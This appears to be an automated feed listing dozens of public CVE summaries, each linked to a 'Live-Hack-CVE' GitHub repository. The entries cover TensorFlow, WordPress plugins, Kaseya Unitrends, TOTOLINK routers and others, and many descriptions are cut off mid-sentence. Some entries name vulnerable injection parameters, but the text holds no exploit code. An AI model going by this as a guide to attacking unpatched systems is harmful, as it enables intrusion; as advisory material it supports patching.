**An open redirect flaw was found in Kibana versions before 7.13.0 and 6.8.16. If a logged in user visits a maliciously crafted URL, it could result in Kibana redirecting the user to an arbitrary website. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22141](https://github.com/Live-Hack-CVE/CVE-2021-22141) create time: 2022-12-28T05:16:34Z

**ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. A MiTM attacker having access to victim's traffic at the TCP/IP layer can redirect traffic from one subdomain to ano CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3618](https://github.com/Live-Hack-CVE/CVE-2021-3618) create time: 2022-12-28T05:15:37Z

**An attacker with local access to the system can make unauthorized modifications of the security configuration of the SOC registers. This could allow potential corruption of AMD secure processor’s encrypted memory contents which may lead to arbitrary code execution in ASP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26360](https://github.com/Live-Hack-CVE/CVE-2021-26360) create time: 2022-12-28T05:14:26Z

**Insufficient verification of missing size check in 'LoadModule' may lead to an out-of-bounds write potentially allowing an attacker with privileges to gain code execution of the OS/kernel by loading a malicious TA. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26392](https://github.com/Live-Hack-CVE/CVE-2021-26392) create time: 2022-12-28T05:14:23Z

**Insufficient verification of multiple header signatures while loading a Trusted Application (TA) may allow an attacker with privileges to gain code execution in that TA or the OS/kernel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26391](https://github.com/Live-Hack-CVE/CVE-2021-26391) create time: 2022-12-28T05:14:19Z

**Insufficient memory cleanup in the AMD Secure Processor (ASP) Trusted Execution Environment (TEE) may allow an authenticated attacker with privileges to generate a valid signed TA and potentially poison the contents of the process memory with attacker controlled data resulting in a loss of confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26393](https://github.com/Live-Hack-CVE/CVE-2021-26393) create time: 2022-12-28T05:14:16Z

**The WP User Frontend WordPress plugin before 3.5.29 uses a user supplied argument called urhidden in its registration form, which contains the role for the account to be created with, encrypted via wpuf_encryption(). This could allow an attacker having access to the AUTH_KEY and AUTH_SALT constant (via an arbitrary fil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24649](https://github.com/Live-Hack-CVE/CVE-2021-24649) create time: 2022-12-28T04:43:34Z

**A flaw was found in Keycloak. This vulnerability allows anyone to register a new security device or key when there is not a device already registered for any user by using the WebAuthn password-less login flow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3632](https://github.com/Live-Hack-CVE/CVE-2021-3632) create time: 2022-12-28T04:41:58Z

**** DISPUTED ** A Memory Leak vulnerability exists in SQLite Project SQLite3 3.35.1 and 3.37.0 via maliciously crafted SQL Queries (made via editing the Database File), it is possible to query a record, and leak subsequent bytes of memory that extend beyond the record, which could let a malicious user obtain sensitive i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45346](https://github.com/Live-Hack-CVE/CVE-2021-45346) create time: 2022-12-28T04:41:55Z

**Uncontrolled Resource Consumption vulnerability in Mitsubishi Electric MELSEC iQ-R Series R00/01/02CPU Firmware versions "24" and prior, Mitsubishi Electric MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "57" and prior, Mitsubishi Electric MELSEC iQ-R Series R08/16/32/120SFCPU Firmware versions "28" and p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20609](https://github.com/Live-Hack-CVE/CVE-2021-20609) create time: 2022-12-28T04:35:46Z

**Improper Input Validation vulnerability in Mitsubishi Electric MELSEC iQ-R Series R00/01/02CPU Firmware versions "24" and prior, Mitsubishi Electric MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "57" and prior, Mitsubishi Electric MELSEC iQ-R Series R08/16/32/120SFCPU Firmware versions "28" and prior, Mi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20611](https://github.com/Live-Hack-CVE/CVE-2021-20611) create time: 2022-12-28T04:35:31Z

**Improper Handling of Length Parameter Inconsistency vulnerability in Mitsubishi Electric MELSEC iQ-R Series R00/01/02CPU Firmware versions "24" and prior, Mitsubishi Electric MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "57" and prior, Mitsubishi Electric MELSEC iQ-R Series R08/16/32/120SFCPU Firmware v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20610](https://github.com/Live-Hack-CVE/CVE-2021-20610) create time: 2022-12-28T04:35:28Z

**The ftp client in GNU Inetutils before 2.2 does not validate addresses returned by PASV/LSPV responses to make sure they match the server address. This is similar to CVE-2020-8284 for curl. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40491](https://github.com/Live-Hack-CVE/CVE-2021-40491) create time: 2022-12-28T04:35:14Z

**mod_radius in ProFTPD before 1.3.7c allows memory disclosure to RADIUS servers because it copies blocks of 16 characters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46854](https://github.com/Live-Hack-CVE/CVE-2021-46854) create time: 2022-12-28T04:33:10Z

**InstallBuilder Qt installers built with versions previous to 22.10 try to load DLLs from the installer binary parent directory when displaying popups. This may allow an attacker to plant a malicious DLL in the installer parent directory to allow executing code with the privileges of the installer (when the popup trigge CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31694](https://github.com/Live-Hack-CVE/CVE-2022-31694) create time: 2022-12-28T05:17:08Z

**Auth. WordPress Options Change vulnerability in Image Hover Effects Ultimate plugin <= 9.7.1 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42459](https://github.com/Live-Hack-CVE/CVE-2022-42459) create time: 2022-12-28T05:17:04Z

**Sensitive Information Disclosure vulnerability discovered by Quiz And Survey Master plugin <= 7.3.10 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42883](https://github.com/Live-Hack-CVE/CVE-2022-42883) create time: 2022-12-28T05:17:01Z

**Auth. (subscriber+) Insecure Direct Object References (IDOR) vulnerability in Comments – wpDiscuz plugin 7.4.2 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43492](https://github.com/Live-Hack-CVE/CVE-2022-43492) create time: 2022-12-28T05:16:54Z

**TensorFlow is an open source platform for machine learning. If `tf.raw_ops.TensorListResize` is given a nonscalar value for input `size`, it results `CHECK` fail which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 888e34b49009a4e734c27ab0c43b0b5102682c56. The fix will be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41893](https://github.com/Live-Hack-CVE/CVE-2022-41893) create time: 2022-12-28T05:16:51Z

**Auth. (admin+) Arbitrary File Read vulnerability in S2W – Import Shopify to WooCommerce plugin <= 1.1.12 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44634](https://github.com/Live-Hack-CVE/CVE-2022-44634) create time: 2022-12-28T05:16:47Z

**TensorFlow is an open source platform for machine learning. The reference kernel of the `CONV_3D_TRANSPOSE` TensorFlow Lite operator wrongly increments the data_ptr when adding the bias to the result. Instead of `data_ptr += num_channels;` it should be `data_ptr += output_num_channels;` as if the number of input channe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41894](https://github.com/Live-Hack-CVE/CVE-2022-41894) create time: 2022-12-28T05:16:44Z

**Cross-Site Request Forgery (CSRF) vulnerability in REST API Authentication plugin <= 2.4.0 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45073](https://github.com/Live-Hack-CVE/CVE-2022-45073) create time: 2022-12-28T05:16:41Z

**TensorFlow is an open source platform for machine learning. If `SparseFillEmptyRowsGrad` is given empty inputs, TensorFlow will crash. We have patched the issue in GitHub commit af4a6a3c8b95022c351edae94560acc61253a1b8. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41898](https://github.com/Live-Hack-CVE/CVE-2022-41898) create time: 2022-12-28T05:16:37Z

**TensorFlow is an open source platform for machine learning. If `MirrorPadGrad` is given outsize input `paddings`, TensorFlow will give a heap OOB error. We have patched the issue in GitHub commit 717ca98d8c3bba348ff62281fdf38dcb5ea1ec92. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41895](https://github.com/Live-Hack-CVE/CVE-2022-41895) create time: 2022-12-28T05:16:30Z

**TensorFlow is an open source platform for machine learning. When running on GPU, `tf.image.generate_bounding_box_proposals` receives a `scores` input that must be of rank 4 but is not checked. We have patched the issue in GitHub commit cf35502463a88ca7185a99daa7031df60b3c1c98. The fix will be included in TensorFlow 2.1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41888](https://github.com/Live-Hack-CVE/CVE-2022-41888) create time: 2022-12-28T05:16:05Z

**TensorFlow is an open source platform for machine learning. If a list of quantized tensors is assigned to an attribute, the pywrap code fails to parse the tensor and returns a `nullptr`, which is not caught. An example can be seen in `tf.compat.v1.extract_volume_patches` by passing in quantized tensors as input `ksizes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41889](https://github.com/Live-Hack-CVE/CVE-2022-41889) create time: 2022-12-28T05:16:01Z

**TensorFlow is an open source platform for machine learning. If `BCast::ToShape` is given input larger than an `int32`, it will crash, despite being supposed to handle up to an `int64`. An example can be seen in `tf.experimental.numpy.outer` by passing in large input to the input `b`. We have patched the issue in GitHub CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41890](https://github.com/Live-Hack-CVE/CVE-2022-41890) create time: 2022-12-28T05:15:58Z

**TensorFlow is an open source platform for machine learning. If `tf.raw_ops.TensorListConcat` is given `element_shape=[]`, it results segmentation fault which can be used to trigger a denial of service attack. We have patched the issue in GitHub commit fc33f3dc4c14051a83eec6535b608abe1d355fde. The fix will be included i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41891](https://github.com/Live-Hack-CVE/CVE-2022-41891) create time: 2022-12-28T05:15:54Z

**TensorFlow is an open source platform for machine learning. When the `BaseCandidateSamplerOp` function receives a value in `true_classes` larger than `range_max`, a heap oob read occurs. We have patched the issue in GitHub commit b389f5c944cadfdfe599b3f1e4026e036f30d2d4. The fix will be included in TensorFlow 2.11. We CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41880](https://github.com/Live-Hack-CVE/CVE-2022-41880) create time: 2022-12-28T05:15:51Z

**TensorFlow is an open source platform for machine learning. If a numpy array is created with a shape such that one element is zero and the others sum to a large number, an error will be raised. We have patched the issue in GitHub commit 2b56169c16e375c521a3bc8ea658811cc0793784. The fix will be included in TensorFlow 2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41884](https://github.com/Live-Hack-CVE/CVE-2022-41884) create time: 2022-12-28T05:15:47Z

**TensorFlow is an open source platform for machine learning. When `tf.raw_ops.ImageProjectiveTransformV2` is given a large output shape, it overflows. We have patched the issue in GitHub commit 8faa6ea692985dbe6ce10e1a3168e0bd60a723ba. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41886](https://github.com/Live-Hack-CVE/CVE-2022-41886) create time: 2022-12-28T05:15:44Z

**TensorFlow is an open source platform for machine learning. `tf.keras.losses.poisson` receives a `y_pred` and `y_true` that are passed through `functor::mul` in `BinaryOp`. If the resulting dimensions overflow an `int32`, TensorFlow will crash due to a size mismatch during broadcast assignment. We have patched the issu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41887](https://github.com/Live-Hack-CVE/CVE-2022-41887) create time: 2022-12-28T05:15:40Z

**NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to cause a worker process crash, or might result in worker proces CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41742](https://github.com/Live-Hack-CVE/CVE-2022-41742) create time: 2022-12-28T05:15:34Z

**Multiple Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerabilities in Accordions plugin <= 2.0.3 on WordPress via &addons-style-name and &accordions_or_faqs_license_key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45082](https://github.com/Live-Hack-CVE/CVE-2022-45082) create time: 2022-12-28T05:15:30Z

**In Linaro Automated Validation Architecture (LAVA) before 2022.11.1, remote code execution can be achieved through user-submitted Jinja2 template. The REST API endpoint for validating device configuration files in lava-server loads input as a Jinja2 template in a way that can be used to trigger remote code execution in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45132](https://github.com/Live-Hack-CVE/CVE-2022-45132) create time: 2022-12-28T05:15:27Z

**Auth. (subscriber+) Broken Access Control vulnerability in Plugin for Google Reviews plugin <= 2.2.2 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45369](https://github.com/Live-Hack-CVE/CVE-2022-45369) create time: 2022-12-28T05:15:23Z

**Block BYPASS vulnerability in iQ Block Country plugin <= 1.2.18 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41155](https://github.com/Live-Hack-CVE/CVE-2022-41155) create time: 2022-12-28T05:15:20Z

**TensorFlow is an open source platform for machine learning. Inputs `dense_features` or `example_state_data` not of rank 2 will trigger a `CHECK` fail in `SdcaOptimizer`. We have patched the issue in GitHub commit 80ff197d03db2a70c6a111f97dcdacad1b0babfa. The fix will be included in TensorFlow 2.11. We will also cherryp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41899](https://github.com/Live-Hack-CVE/CVE-2022-41899) create time: 2022-12-28T05:15:16Z

**TensorFlow is an open source platform for machine learning. The security vulnerability results in FractionalMax(AVG)Pool with illegal pooling_ratio. Attackers using Tensorflow can exploit the vulnerability. They can access heap memory which is not in the control of user, leading to a crash or remote code execution. We CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41900](https://github.com/Live-Hack-CVE/CVE-2022-41900) create time: 2022-12-28T05:15:13Z

**TensorFlow is an open source platform for machine learning. An input `sparse_matrix` that is not a matrix with a shape with rank 0 will trigger a `CHECK` fail in `tf.raw_ops.SparseMatrixNNZ`. We have patched the issue in GitHub commit f856d02e5322821aad155dad9b3acab1e9f5d693. The fix will be included in TensorFlow 2.11 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41901](https://github.com/Live-Hack-CVE/CVE-2022-41901) create time: 2022-12-28T05:15:10Z

**TensorFlow is an open source platform for machine learning. When `tf.raw_ops.ResizeNearestNeighborGrad` is given a large `size` input, it overflows. We have patched the issue in GitHub commit 00c821af032ba9e5f5fa3fe14690c8d28a657624. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on Te CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41907](https://github.com/Live-Hack-CVE/CVE-2022-41907) create time: 2022-12-28T05:15:06Z

**TensorFlow is an open source platform for machine learning. An input `token` that is not a UTF-8 bytestring will trigger a `CHECK` fail in `tf.raw_ops.PyFunc`. We have patched the issue in GitHub commit 9f03a9d3bafe902c1e6beb105b2f24172f238645. The fix will be included in TensorFlow 2.11. We will also cherrypick this c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41908](https://github.com/Live-Hack-CVE/CVE-2022-41908) create time: 2022-12-28T05:14:59Z

**SQL injection attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4093](https://github.com/Live-Hack-CVE/CVE-2022-4093) create time: 2022-12-28T05:14:13Z

**Grafana is an open-source platform for monitoring and observability. Versions on the 8.x and 9.x branch prior to 9.0.3, 8.5.9, 8.4.10, and 8.3.10 are vulnerable to stored cross-site scripting via the Unified Alerting feature of Grafana. An attacker can exploit this vulnerability to escalate privilege from editor to adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31097](https://github.com/Live-Hack-CVE/CVE-2022-31097) create time: 2022-12-28T05:14:09Z

**An issue was discovered in open-vm-tools 2009.03.18-154848. Local users can bypass intended access restrictions on mounting shares via a symlink attack that leverages a realpath race condition in mount.vmhgfs (aka hgfsmounter). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-1143](https://github.com/Live-Hack-CVE/CVE-2009-1143) create time: 2022-12-28T03:58:18Z

**An issue was discovered in open-vm-tools 2009.03.18-154848. Local users can gain privileges via a symlink attack on /tmp files if vmware-user-suid-wrapper is setuid root and the ChmodChownDirectory function is enabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-1142](https://github.com/Live-Hack-CVE/CVE-2009-1142) create time: 2022-12-28T03:58:12Z

**In Python (aka CPython) up to 3.10.8, the mailcap module does not add escape characters into commands discovered in the system mailcap file. This may allow attackers to inject shell commands into applications that call mailcap.findmatch with untrusted input (if they lack validation of user-provided filenames or argumen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-20107](https://github.com/Live-Hack-CVE/CVE-2015-20107) create time: 2022-12-28T03:59:40Z

**In Hyland Perceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux, a crafted OpenDocument document can lead to a SkCanvas object double free resulting in direct code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3855](https://github.com/Live-Hack-CVE/CVE-2018-3855) create time: 2022-12-28T03:52:39Z

**A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3862](https://github.com/Live-Hack-CVE/CVE-2018-3862) create time: 2022-12-28T03:52:35Z

**In the ffgphd and ffgtkn functions in NASA CFITSIO 3.42, specially crafted images parsed via the library can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can deliver an FIT image to trigger this vulnerability and potentially gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3846](https://github.com/Live-Hack-CVE/CVE-2018-3846) create time: 2022-12-28T03:52:32Z

**Stack-based buffer overflow in the get_key function in parse.c in abcm2ps through 8.13.20 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-10771](https://github.com/Live-Hack-CVE/CVE-2018-10771) create time: 2022-12-28T03:52:25Z

**Multiple exploitable buffer overflow vulnerabilities exist in image parsing functionality of the CFITSIO library version 3.42. Specially crafted images parsed via the library, can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can deliver an FIT image to trigger this vulnerability and poten CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3847](https://github.com/Live-Hack-CVE/CVE-2018-3847) create time: 2022-12-28T03:52:22Z

**Stack-based buffer overflow in the delayed_output function in music.c in abcm2ps through 8.13.20 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-10753](https://github.com/Live-Hack-CVE/CVE-2018-10753) create time: 2022-12-28T03:52:18Z

**All Samba versions 4.x.x before 4.9.17, 4.10.x before 4.10.11 and 4.11.x before 4.11.3 have an issue, where the S4U (MS-SFU) Kerberos delegation model includes a feature allowing for a subset of clients to be opted out of constrained delegation in any way, either S4U2Self or regular Kerberos authentication, by forcing CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14870](https://github.com/Live-Hack-CVE/CVE-2019-14870) create time: 2022-12-28T04:01:50Z

**moinejf abcm2ps 8.13.20 is affected by: Incorrect Access Control. The impact is: Allows attackers to cause a denial of service attack via a crafted file. The component is: front.c, function txt_add. The fixed version is: after commit commit 08aef597656d065e86075f3d53fda89765845eae. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1010069](https://github.com/Live-Hack-CVE/CVE-2019-1010069) create time: 2022-12-28T03:52:28Z

**In QEMU 5.0.0 and earlier, megasas_lookup_frame in hw/scsi/megasas.c has an out-of-bounds read via a crafted reply_queue_head field from a guest OS user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13362](https://github.com/Live-Hack-CVE/CVE-2020-13362) create time: 2022-12-28T03:51:36Z

**A flaw was found when using samba as an Active Directory Domain Controller. Due to the way samba handles certain requests as an Active Directory Domain Controller LDAP server, an unauthorized user can cause a stack overflow leading to a denial of service. The highest threat from this vulnerability is to system availabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10704](https://github.com/Live-Hack-CVE/CVE-2020-10704) create time: 2022-12-28T03:21:31Z

**A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10685](https://github.com/Live-Hack-CVE/CVE-2020-10685) create time: 2022-12-28T03:21:27Z

**Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5752](https://github.com/Live-Hack-CVE/CVE-2020-5752) create time: 2022-12-28T03:21:16Z

**In etcd before versions 3.3.23 and 3.4.10, certain directory paths are created (etcd data directory and the directory path when provided to automatically generate self-signed certificates for TLS connections with clients) with restricted access permissions (700) by using the os.MkdirAll. This function does not perform CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15113](https://github.com/Live-Hack-CVE/CVE-2020-15113) create time: 2022-12-28T03:21:12Z

**An integer overflow leading to a heap-buffer overflow was found in The X Input Method (XIM) client was implemented in libX11 before version 1.6.10. As per upstream this is security relevant when setuid programs call XIM client functions while running with elevated privileges. No such programs are shipped with Red Hat E CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14344](https://github.com/Live-Hack-CVE/CVE-2020-14344) create time: 2022-12-28T03:21:08Z

**** DISPUTED ** An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16164](https://github.com/Live-Hack-CVE/CVE-2020-16164) create time: 2022-12-28T03:21:04Z

**A flaw was found in openstack-keystone. Only the first 72 characters of an application secret are verified allowing attackers bypass some password complexity which administrators may be counting on. The highest threat from this vulnerability is to data confidentiality and integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3563](https://github.com/Live-Hack-CVE/CVE-2021-3563) create time: 2022-12-28T03:59:36Z

**The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption and use the application as a platform for attacks against its users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35246](https://github.com/Live-Hack-CVE/CVE-2021-35246) create time: 2022-12-28T03:58:43Z

**BIND 9.11.0 -> 9.11.36 9.12.0 -> 9.16.26 9.17.0 -> 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -> 9.11.36-S1 9.16.8-S1 -> 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The ca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25220](https://github.com/Live-Hack-CVE/CVE-2021-25220) create time: 2022-12-28T03:58:39Z

**SQL Injection vulnerability in function get_user in login_manager.php in rizalafani cms-php v1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35284](https://github.com/Live-Hack-CVE/CVE-2021-35284) create time: 2022-12-28T03:58:15Z

**An issue was discovered in JIZHI CMS 1.9.4. There is a CSRF vulnerability that can add an admin account via index, /admin.php/Admin/adminadd.html CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29334](https://github.com/Live-Hack-CVE/CVE-2021-29334) create time: 2022-12-28T03:56:51Z

**A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successfully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3652](https://github.com/Live-Hack-CVE/CVE-2021-3652) create time: 2022-12-28T03:56:04Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The SNMP daemon was configured with a weak default community. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43044](https://github.com/Live-Hack-CVE/CVE-2021-43044) create time: 2022-12-28T03:53:34Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The apache user could read arbitrary files such as /etc/shadow by abusing an insecure Sudo rule. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43043](https://github.com/Live-Hack-CVE/CVE-2021-43043) create time: 2022-12-28T03:53:31Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. A buffer overflow existed in the vaultServer component. This was exploitable by a remote unauthenticated attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43042](https://github.com/Live-Hack-CVE/CVE-2021-43042) create time: 2022-12-28T03:53:27Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. A crafted HTTP request could induce a format string vulnerability in the privileged vaultServer application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43041](https://github.com/Live-Hack-CVE/CVE-2021-43041) create time: 2022-12-28T03:53:24Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The privileged vaultServer could be leveraged to create arbitrary writable files, leading to privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43040](https://github.com/Live-Hack-CVE/CVE-2021-43040) create time: 2022-12-28T03:53:17Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The Samba file sharing service allowed anonymous read/write access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43039](https://github.com/Live-Hack-CVE/CVE-2021-43039) create time: 2022-12-28T03:53:13Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The wguest account could execute commands by injecting into PostgreSQL trigger functions. This allowed privilege escalation from the wguest user to the postgres user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43038](https://github.com/Live-Hack-CVE/CVE-2021-43038) create time: 2022-12-28T03:53:10Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The Unitrends Windows agent was vulnerable to DLL injection and binary planting due to insecure default permissions. This allowed privilege escalation from an unprivileged user to SYSTEM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43037](https://github.com/Live-Hack-CVE/CVE-2021-43037) create time: 2022-12-28T03:53:06Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The password for the PostgreSQL wguest account is weak. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43036](https://github.com/Live-Hack-CVE/CVE-2021-43036) create time: 2022-12-28T03:53:03Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. Two unauthenticated SQL injection vulnerabilities were discovered, allowing arbitrary SQL queries to be injected and executed under the postgres superuser account. Remote code execution was possible, leading to full access to the postgres user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43035](https://github.com/Live-Hack-CVE/CVE-2021-43035) create time: 2022-12-28T03:52:59Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. A world writable file allowed local users to execute arbitrary code as the user apache, leading to privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43034](https://github.com/Live-Hack-CVE/CVE-2021-43034) create time: 2022-12-28T03:52:56Z

**An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. Multiple functions in the bpserverd daemon were vulnerable to arbitrary remote code execution as root. The vulnerability was caused by untrusted input (received by the server) being passed to system calls. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43033](https://github.com/Live-Hack-CVE/CVE-2021-43033) create time: 2022-12-28T03:52:53Z

**Linux distributions using CAP_SYS_NICE for gnome-shell may be exposed to a privilege escalation issue. An attacker, with low privilege permissions, may take advantage of the way CAP_SYS_NICE is currently implemented and eventually load code to increase its process scheduler priority leading to possible DoS of other ser CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3982](https://github.com/Live-Hack-CVE/CVE-2021-3982) create time: 2022-12-28T03:51:39Z

**TOTOLINK NR1800X V9.1.0u.6279_B20210910 contains a command injection via the FileName parameter in the setUploadSetting function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44252](https://github.com/Live-Hack-CVE/CVE-2022-44252) create time: 2022-12-28T04:02:58Z

**TOTOLINK NR1800X V9.1.0u.6279_B20210910 contains a command injection via the ussd parameter in the setUssd function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44251](https://github.com/Live-Hack-CVE/CVE-2022-44251) create time: 2022-12-28T04:02:54Z

**TOTOLINK NR1800X V9.1.0u.6279_B20210910 contains a command injection via the hostName parameter in the setOpModeCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44250](https://github.com/Live-Hack-CVE/CVE-2022-44250) create time: 2022-12-28T04:02:51Z

